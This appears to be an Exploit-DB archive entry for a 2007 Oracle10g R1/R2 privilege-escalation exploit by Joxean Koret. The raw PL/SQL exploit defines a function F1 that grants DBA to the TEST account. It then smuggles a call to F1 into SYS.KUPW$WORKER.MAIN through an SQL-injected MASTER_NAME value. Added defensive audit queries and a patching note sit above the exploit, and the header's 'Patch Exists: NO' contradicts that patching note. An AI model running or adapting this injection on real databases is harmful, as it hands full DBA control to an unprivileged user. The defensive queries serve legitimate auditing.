Vendor: Oracle10g
By: Joxean Koret
CVSS: 7.5 (HIGH)
Privilege Escalation
Product Name: Oracle10g
Affected Version From: Oracle10g R1 and R2 versions prior to CPU Oct 2006
Affected Version To: Oracle10g R1 and R2 versions prior to CPU Oct 2006
Patch Exists: NO
2007

Oracle10g R1 and R2 Privilege Escalation Exploit

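This exploit targets Oracle10g R1 and R2 versions prior to CPU Oct 2006. It lets a user who holds only the CREATE SESSION and CREATE PROCEDURE privileges escalate their privileges. The exploit creates a function called F1, declared AUTHID CURRENT_USER with PRAGMA AUTONOMOUS_TRANSACTION, which grants DBA privileges to the user 'TEST' and commits the change. It then calls SYS.KUPW$WORKER.MAIN with a MASTER_NAME value crafted so that F1 is evaluated inside the SQL the package runs, which executes the function with the package's privileges. The user_role_privs view is queried before and after the call to show the change in granted roles. The exploit was developed by Joxean Koret.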

Mitigation:

Apply the latest CPU patch from Oracle to fix this vulnerability.
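
Checks a DBA can run alongside patching, as an added example that is not part of the original entry or the exploit author's code. It assumes a DBA-privileged session, the standard data dictionary views, and an expected-admin list of SYS and SYSTEM that should be adjusted per site.

```sql
-- Added audit queries (not from the original exploit). Run as a DBA.

-- 1. Every holder of the DBA role. Any grantee outside the expected
--    administrators (for example the TEST account named above) needs review.
SELECT grantee, granted_role, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;

-- 2. Who is allowed to execute the package the exploit calls.
SELECT grantee, privilege, grantor
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'KUPW$WORKER';

-- 3. Stored code outside SYS/SYSTEM (assumed admin schemas) that combines an
--    autonomous transaction with a GRANT statement, the shape of F1.
--    DBA_SOURCE holds one row per source line, so the two markers are
--    matched on separate rows of the same object.
SELECT DISTINCT s.owner, s.name, s.type
FROM   dba_source s
WHERE  s.owner NOT IN ('SYS', 'SYSTEM')
AND    UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
AND    EXISTS (SELECT 1
               FROM   dba_source g
               WHERE  g.owner = s.owner
               AND    g.name  = s.name
               AND    g.type  = s.type
               AND    UPPER(g.text) LIKE '%GRANT %')
ORDER  BY s.owner, s.name;

-- 4. Accounts that hold the CREATE PROCEDURE privilege the exploit needs.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
ORDER  BY grantee;

-- 5. Record future role and system-privilege grants (requires the
--    AUDIT_TRAIL initialization parameter to be enabled), then review them.
AUDIT SYSTEM GRANT BY ACCESS;

SELECT username, timestamp, action_name, obj_name, grantee
FROM   dba_audit_trail
WHERE  action_name LIKE 'GRANT%'
ORDER  BY timestamp DESC;
```

Query 3 is a heuristic: it flags legitimate code that uses both constructs and misses source that has been wrapped or that assembles the statement text at run time.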

Exploit-DB raw data:

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

// milw0rm.com [2007-01-23]